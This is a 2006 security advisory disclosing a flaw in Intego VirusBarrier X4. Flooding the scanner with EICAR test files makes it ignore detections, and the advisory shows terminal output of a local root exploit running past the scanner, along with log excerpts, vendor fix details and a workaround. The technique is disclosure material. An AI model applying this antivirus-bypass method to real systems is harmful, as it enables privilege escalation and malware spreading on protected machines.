DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com
Product: 'Intego VirusBarrier X4 <= VirusBarrierX47070.dmg'
References:
http://www.digitalmunition.com/DMA[2006-1031a].txt
Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus
security solution for Macintosh computers, by Intego, the
leading publisher of personal security software for Macintosh. It offers
thorough protection against viruses of all types, coming
from infected files or applications, whether on CD-ROMs, DVDs or other
removable media, or on files downloaded over the Internet
or other types of networks.
Intego VirusBarrier X4 protects your computer from viruses by constantly
examining all the files that your computer opens and
writes, as well as watching for suspicious activity that may be the sign
of viruses acting on applications or other files. With
Intego VirusBarrier X4 on your computer, you can rest assured that your
Macintosh has the best protection available against
viruses of all kinds.
Although VirusBarrier does a pretty good job of halting malicous activity
the product currently suffers from a flaw related to the
amount of alerts that it can process simultaneously. If an attacker is
able to trigger multiple alerts in succession within a very
short amount of time he or she may be able cause VirusBarrier to
completely ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or
further spreading of malware.
As an example we will show how VirusBarrier normally stops a local root
exploit with behavior similar to 'OSX.ExploitMachex.A', then
we will demonstrate how the VirusBarrier protection can be bypassed by
using a simple flood of Eicar Test files.
Any typical attempt to access or execute a file or program that is a match
for a VirusBarrier definition results in an alert on the
user interface. There is a sweet lookin insulin bottle on the screen that
slowly empties as the virus nears eradication.
'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do
('Ignore' || 'Repair')?
Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus
program existed at all.
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)
On the other hand if you chose 'Repair' the process is terminated dead in
its tracks and the file is nulled out:
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit
The above output demonstrates how Virusbarrier is supposed to work. Under
normal circumstances this would be adequate to stop a
malicious attack.
If however an attacker floods the file system with dummy virus files at a
quick rate the VirusBarrier software will promptly stop
responding after presenting the user with a few audible and visual alerts.
After about 40 some odd infected files in a row the
system will become confused and in some cases VirusBarrier may stop
responding completely. (Intego confirmed a limit of 20 files)
When under attack the user may see dozens of messages on the screen. With
our example code the messages are similar to the following:
'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?
From the attackers standpoint the exploitation is fairly quick and simple.
Our example uses a local root exploit however this tactic
could easily be applied to any existing malware technique that Intego
VirusBarrier protects against. Code could in theory be run as a
precurser to an InqTana attack as a means to bypass the Intego protection.
The existing signatures for InqTana A B C and D would
then be completely useless and an E variant would be born.
virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl Pwntego.sh README.txt pwntego.uu
rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;
p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel),
81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied
In the above example 'OSX.ExploitMachex.A' is being executed on a machine
that is actively protected by VirusBarrier. In a matter of
seconds the Intego engine is flooded and the attacker has the ability to
completely ignore any Intego virus and malware definitions.
One fun side effect of this attack is that the user must manually ignore a
number of alerts. The users is either forced to Wait for
each alert to timeout on its own after several seconds or respond
individually to each one.
This attack has a fairly obvious signature in syslog if the attacker is
making use of the example code provided in this text.
Obviousyly using random viruses and better random locations and names is a
possible vactor for a crafty attacker.
virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by
OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by
EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by
EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261
by EICAR Test
With the current fixes in place once VirusBarrier gets 19 alerts, the next
malware is simply quarantined until the administrator can
repair them. In our example, the additional processes get a permission
error when they are executed.
Of course since everyone knows there is no malware for Macintosh this
scenario would quite simply never be encountered..... *smirk*
The Intego staff was more than helpful and willing to address this issue
in a timely fashion. After communications were established
this problem was addressed, and fixes were out the door to customers in a
matter of 2 days. How about that for turn around time!
Workaround:
Please update to the latest version of Intego Virus Barrier and the latest
Vdefs.
http://www.intego.com/services/updates.asp?product=VirusBarrier
Intego has fixed this bug in the 2006/11/01 Vdef files.
